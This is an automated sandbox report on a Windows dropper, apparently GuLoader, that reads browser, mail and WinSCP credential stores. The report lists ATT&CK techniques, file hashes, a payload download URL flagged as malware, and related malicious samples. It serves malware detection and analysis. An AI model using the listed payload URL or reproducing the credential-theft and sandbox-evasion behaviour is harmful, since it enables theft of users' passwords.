          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes\ridningen.txtJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI/Special instruction interceptor: Address: 7950444
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI/Special instruction interceptor: Address: 4870444
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 35840000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 37840000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406620 FindFirstFileA,FindClose,2_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4658
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4508
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00401A43 LdrInitializeThunk,ExpandEnvironmentStringsA,lstrcmpA,0_2_00401A43
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6C601B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6C601B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Users\user\Desktop\004552024107.bat.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: Yara matchFile source: 00000002.00000002.91159403030.0000000035875000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 004552024107.bat.exe PID: 7736, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          1
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          126
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          Process Injection
          1
          Obfuscated Files or Information
          Security Account Manager31
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS12
          Virtualization/Sandbox Evasion
          Distributed Component Object Model1
          Clipboard Data
          12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          004552024107.bat.exe100%AviraHEUR/AGEN.1338492
          004552024107.bat.exe18%ReversingLabs
          004552024107.bat.exe16%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\BgImage.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\BgImage.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\UserInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\UserInfo.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\nsExec.dll0%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          ip-api.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://185.222.58.113/bJibCYgZszSl185.bin100%Avira URL Cloudmalware
          http://www.skinstudio.netG0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
          http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
          http://ip-api.com0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
          http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
          http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
          http://ip-api.com0%VirustotalBrowse
          http://ip-api.com/line/?fields=hosting0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          ip-api.com
          208.95.112.1
          truetrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://185.222.58.113/bJibCYgZszSl185.binfalse
          • Avira URL Cloud: malware
          unknown
          http://ip-api.com/line/?fields=hostingfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nsis.sf.net/NSIS_Error004552024107.bat.exe, 004552024107.bat.exe, 00000002.00000000.86158763790.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorError004552024107.bat.exe, 00000000.00000000.86050806311.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000002.00000000.86158763790.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name004552024107.bat.exe, 00000002.00000002.91159403030.0000000035841000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.skinstudio.netG004552024107.bat.exe, 00000000.00000000.86050872987.0000000000443000.00000002.00000001.01000000.00000003.sdmp, 004552024107.bat.exe, 00000002.00000000.86158789143.0000000000443000.00000002.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com004552024107.bat.exe, 00000002.00000002.91159403030.0000000035841000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          208.95.112.1
          ip-api.comUnited States
          53334TUT-ASUStrue
          185.222.58.113
          unknownNetherlands
          51447ROOTLAYERNETNLfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1465162
          Start date and time:2024-07-01 12:06:54 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 15m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:004552024107.bat.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/17@1/2
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 94%
          • Number of executed functions: 142
          • Number of non-executed functions: 64
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
          • Execution Graph export aborted for target 004552024107.bat.exe, PID 7736 because it is empty
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          208.95.112.1DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • ip-api.com/json/
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          a.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          a.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          Example.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          Example.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
          • ip-api.com/json/?fields=225545
          185.222.58.113Documents.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/QZxiWpS132.bin
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/dzPxpaYSrjQF221.bin
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/aZZfDlS144.bin
          e6FEkdlKCX.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.113:55615/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ip-api.comDHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • 208.95.112.1
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
          • 208.95.112.1
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ROOTLAYERNETNLDocuments.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          v1JxTE3aw1.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.234
          GLslDiEqwx.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.79
          oIZhm8seZB.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          FbfKnwuoXd.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          7f40bfb86707faf0ec8978614840ab858320d1978bc351546833272b7b70c854_payload.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.77
          Q4293pswBW.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.77
          w4XFffGDz1.exeGet hashmaliciousRedLineBrowse
          • 45.137.22.67
          TUT-ASUSDHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • 208.95.112.1
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          hatabat.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
          • 208.95.112.1
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\BgImage.dll004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
            DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
              Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                  P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                    C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                      DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                        Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                          P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                            P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                              pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                pp0fHVNbib.exeGet hashmaliciousGuLoaderBrowse
                                  kZlAkx6fp7.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    kZlAkx6fp7.exeGet hashmaliciousGuLoaderBrowse
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):49
                                      Entropy (8bit):4.75216571132969
                                      Encrypted:false
                                      SSDEEP:3:a6QLQIfLBJXlFGfv:xQkIPeH
                                      MD5:797DA95245047A54F125FBF3B19FA295
                                      SHA1:9E46F51C033836343C4099609F35B9B62C290A00
                                      SHA-256:A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
                                      SHA-512:4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7680
                                      Entropy (8bit):5.188410641489526
                                      Encrypted:false
                                      SSDEEP:96:8eQMA6z4f7TI20Y1wircawlkX1b3+LDfbAJ8uLzqkLnLiEQjJ3KxkP:tChfHv08wocw3+e8uLmyLpmP
                                      MD5:2D5F40DDC34E9DC8F43B5BF1F61301E3
                                      SHA1:5ED3CD47AFFC4D55750E738581FCE2B40158C825
                                      SHA-256:785944E57E8E4971F46F84A07D82DEE2AB4E14A68543D83BFE7BE7D5CDA83143
                                      SHA-512:605CEBCC480CB71BA8241782D89E030A5C01E1359ACCBDE174CB6BDAF249167347ECB06E3781CB9B1CC4B465CEF95F1663F0D9766ED84EBADE87AA3970765B3E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                      • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                      • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                      • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                      • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....C.f...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\004552024107.bat.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):5.744994954995265
                                      Encrypted:false
